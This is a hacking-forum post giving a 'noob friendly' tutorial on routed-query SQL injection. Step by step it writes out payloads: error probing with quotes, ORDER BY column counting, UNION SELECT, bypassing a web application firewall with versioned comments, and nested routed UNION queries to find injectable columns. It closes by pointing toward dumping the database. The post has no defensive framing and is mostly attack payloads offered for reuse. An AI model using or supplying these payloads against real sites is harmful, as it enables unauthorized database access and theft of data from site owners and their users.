If you already have an account with us, please use the login panel below to access your account.

Results 1 to 1 of 1
  1. #1

    Radioactive Icon [New]Routed query based SQL- injection tutorial-by spirit[/noob friendly]

    hello provendorz members

    so, today i am here to demonstrate a tutorial on routed query based sql- injection

    php code:

    so, lets try to inject it

    php code:' [error] 

    lets try to balance our query
    php code:'-- - 

    great , now lets try to find the total number of columns.
    php code:'+order+by+1-- - [no-error]'+order+by+2-- - [no-error]'+order+by+3-- - [no-error]'+order+by+4-- - [no-error]'+order+by+5-- - [no-error]'+order+by+6-- - [error] 

    so, their are 5 numbers of columns now lets try to find the vulnerable one with our union select command.

    php code:'+u nion+s elect+1,2,3,4,5-- -  [waf detected] 
    so, waf lets bypass it check my this thread
    some basics ways to bypass waf

    php code:'+/*!12345u nion*/+s elect+1,2,3,4,5-- -  [waf bypassed] 
    waf bypassed great.
    check my this thread first.

    [tutorial]sql-injection::new way to get vulnerable column by brute forcing columns

    nothing works sad , lets try routed based injection

    after column 1 try to false the query by single quote " ' "again.

    php code:'+/*!12345u nion*/+s elect+1',2,3,4,5-- - [error] 
    so now we got the error so lets try routed query based injection

    now suppose that 1 is your new parameter so for balancing we will put 1 under double quotes like this:-"1" and then balance our query with -- - or anything

    lets try it

    php code:'+/*!12345u nion*/+s elect+[doublequote] 1 ' -- - [doublequote],2,3,4,5-- - [no-error] 
    here hf is blocking double quote " so i wrote [doublequote]

    so, lets find the total number of columns using order by clause
    php code:'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 1-- - [doublequote],2,3,4,5-- - [no-error]'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 17 -- - [doublequote],2,3,4,5-- - [no-error]'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 18 -- - [doublequote],2,3,4,5-- - [no-error]'+/*!12345u nion*/+s elect+[doublequote] 1 'order by 19 -- - [doublequote],2,3,4,5-- - [error] 

    means their are 18 numbers of columns, now lets use our union select statement.

    ps:waf is here also.
    php code:'+/*!12345u nion*/+s elect+[doublequote] .1 '+/*!12345u nion*/+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- - [doublequote],2,3,4,5-- - [no-error] 

    so, columns 12,13,14 are vulnerable

    lets try to use our simple dios

    Last edited by The Master; at .



Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts